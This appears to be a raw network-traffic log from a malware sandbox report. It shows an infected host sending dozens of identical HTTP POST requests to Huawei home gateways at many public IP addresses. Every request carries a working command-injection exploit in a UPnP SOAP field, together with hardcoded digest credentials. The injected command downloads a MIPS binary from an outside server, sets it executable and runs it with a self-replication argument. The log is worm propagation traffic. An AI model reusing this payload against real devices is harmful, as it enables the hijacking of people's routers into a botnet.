                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          373192.168.2.2349838157.74.224.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178528070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          374192.168.2.2359788197.216.251.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178529978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          375192.168.2.233521841.162.233.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178553104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          376192.168.2.235126618.45.63.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178554058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          377192.168.2.2345948157.64.146.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178888083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          378192.168.2.233803641.252.216.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178888083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          379192.168.2.235979041.6.163.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178894043 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          380192.168.2.235631265.227.159.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178915024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          381192.168.2.2333476197.183.172.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178915977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          382192.168.2.2341172197.153.166.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178925037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          383192.168.2.235811041.230.146.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178940058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
